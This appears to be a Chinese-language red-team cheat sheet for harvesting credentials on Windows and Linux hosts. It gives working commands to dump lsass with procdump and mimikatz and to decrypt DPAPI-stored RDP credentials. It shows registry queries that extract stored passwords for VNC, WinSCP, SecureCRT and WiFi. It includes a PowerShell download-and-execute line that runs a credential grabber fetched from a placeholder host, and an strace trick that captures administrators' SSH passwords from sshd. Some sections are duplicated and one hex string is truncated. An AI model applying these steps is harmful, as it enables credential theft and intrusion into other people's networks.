内网凭据密码收集方法和技巧

RDP凭证

1.抓取本机RDP密码，工具mimikatz

系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，这时抓取的明文密码为空。

可以尝试解密NTLM（New Technology LAN Manager）获取明文密码,NTLM 是用于Windows身份验证的主要协议之一

2.无用户上线，可以通过dump内存的方式获取密码

如：procdump64.exe -accepteula -ma lsass.exe lsass.dmp

使用mimikatz进行解密

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

3.登陆凭证

当我们使用Windows自带的远程桌面登录成功并选择保存凭据时，会在本地留下rdp登录凭证

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

获取Credentials：

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

获取guidMasterKey

mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\Credentials的值" exit

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" > cerd.txt

查找guid对应的MasterKey：

mimikatz.exe "dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\ Credentials值/masterkey:masterkey值" exit

4.其他

也可以利用netpass直接抓取密码https://www.nirsoft.net/utils/network_password_recovery.html

命令行版本：https://www.nirsoft.net/password_recovery_tools.html

 

VNC密码

配置路径：c:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini，解密工具：https://github.com/jeroennijhof/vncpwd

TightVNC

TightVNC的加密后密码存在注册表里内，需要管理员权限

reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v ControlPassword 
reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v password
reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v RfbPort

解密工具：https://github.com/jeroennijhof/vncpwd

RealVNC

ealVNC的加密后密码存在注册表里内，需要管理员权限。

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver /v password

解密工具：https://github.com/jeroennijhof/vncpwd

 

VPN密码

Windows自带VPN连接，如果在配置VPN时选择记住此密码则会保存连接信息

默认保存连接信息目录

%AppData%\Roaming\Microsoft\Network\Connections\Pbk


Dialupass使用说明和下载地址：https://www.nirsoft.net/utils/dialupass.html
Dialupass使用说明和下载地址：https://www.nirsoft.net/utils/dialupass.html

WiFi密码

WiFi信息查询命令，在cmd下执行，无需管理员权限
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

简介：Xshell是一款功能强大的终端模拟器，支持SSH2，SSH3，SFTP，TELNET，RLOGIN和SERIAL。Xshell密码默认保存位置：

XShell 5：%userprofile%\Documents\NetSarang\Xshell\Sessions
XShell 6：%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XShell 7：%userprofile%\Documents\NetSarang Computer\7\Xshell\Sessions

Xshell

Xshell密码默认保存位置：

XShell 5：%userprofile%\Documents\NetSarang\Xshell\Sessions
XShell 6：%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XShell 7：%userprofile%\Documents\NetSarang Computer\7\Xshell\Sessions

SharpXDecrypt支持解密XShell所有版本，包括XShell 7：

 

Winscp

WinSCP 是一个 Windows 环境下使用的 SSH 的开源图形化 SFTP 客户端。同时支持 SCP 协议。它的主要功能是在本地与远程计算机间安全地复制文件，并且可以直接编辑文件。

通过注册表获得密文：

reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.192.128"

通过winscppwd.exe即可解密：

winscppwd.exe root 192.168.192.128 密文
有时候管理员会导出配置为WinSCP.ini文件。
winscppwd下载地址：https://www.softpedia.com/get/Security/Password-Managers-Generators/winscppwd.shtml也可以使用SharpDecryptPwd直接获取密码

FinalShell默认配置文件地址：

%userprofile%\AppData\Local\finalshell\conn\xxx.json

使用FinalShell-Decoder选择目录即可解密：

SecureCRT

SecureCRT默认配置目录：

dir %APPDATA%\VanDyke\Config\Sessions\

SecureCRT 7.3.3之前的版本使用password加密算法，之后的版本使用password v2算法：

S:"Password"=u17cf50e394ecc2a06fa8919e1bd67cf0f37da34c78e7eb87a3a9a787a9785e802dd0eae4e8039c3ce234d34bfe28bbdc
S:"Password V2"=02:7b9f594a1f39bb36bbaa0d9688ee38b3d233c67b338e20e2113f2ba4d328b6fc8c804e3c02324b1eaad57a5b96ac1fc5cc1ae0ee2930e6af2e5e644a28ebe3fc

7.x 版本解密 [ 不带第一位 "u" ]

SecureCRTCipher.py dec 17cf50e394ecc2a06fa8919e1bd67cf0f37da34c78e7eb87a3a9a787a9785e802dd0eae4e8039c3ce234d34bfe28bbdc

8.x 版本解密 [ 不带前面三位 "02:" ]

SecureCRTCipher.py dec -v2 7b9f594a1f39bb36bbaa0d9688ee38b3d233c67b338e20e

浏览器

WebBrowserPassView使用说明和下载地址：https://www.nirsoft.net/utils/web_browser_password.html WebBrowserPassView支持解密以下浏览器：

• • Internet Explorer (Version 4.0 - 11.0)

• • Mozilla Firefox (All Versions)

• • Google Chrome

• • Chromium-Based Edge

• • Safari

• • Opera

• • Brave

• • Waterfox

• • SeaMonkey

• • Vivaldi

• • Yandex

• • Chromium

下载页面：https://www.nirsoft.net/password_recovery_tools.html

 

HackBrowserData 是一个浏览器数据（密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件）的导出工具，支持全平台主流浏览器。在Windows平台支持以下浏览器的密码，Cookie，书签和历史记录信息：

• • Google Chrome

• • Google Chrome Beta

• • Chromium

• • Microsoft Edge

• • 360 极速浏览器

• • QQ浏览器

• • Brave

• • Opera

• • OperaGX

• • Vivaldi

• • Yandex

• • CocCoc

• • Firefox

• • Firefox Beta

• • Firefox Dev

• • Firefox ESR

• • Firefox Nightly

使用说明和下载地址：https://github.com/moonD4rk/HackBrowserData

 

浏览器

credgrap_ie_edge

工具地址：https://github.com/HanseSecure/credgrap_ie_edge 内存执行powershell解密即可

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx/credgrap_ie_edge.ps1')"

Linux使用strace抓取密码

strace是一个可用于诊断、调试和教学的Linux用户空间跟踪器strace底层使用内核的ptrace特性来实现其功能。

使用strace抓取密码，必须要管理员登录才行，我们可以使用last命令来查看管理员最后登录的时间，登录顺序，由近到远

首先ps -elf |grep sshd 找到sshd的pid,使用nohup strace -f -p pid -o sshd.out.txt &来跟踪sshd进程

然后当管理员使用密码登录以后，下载 sshd.out.txt文件,在文件中搜索read(7, "\f\0\0\0\f,字符串后面的即是明文密码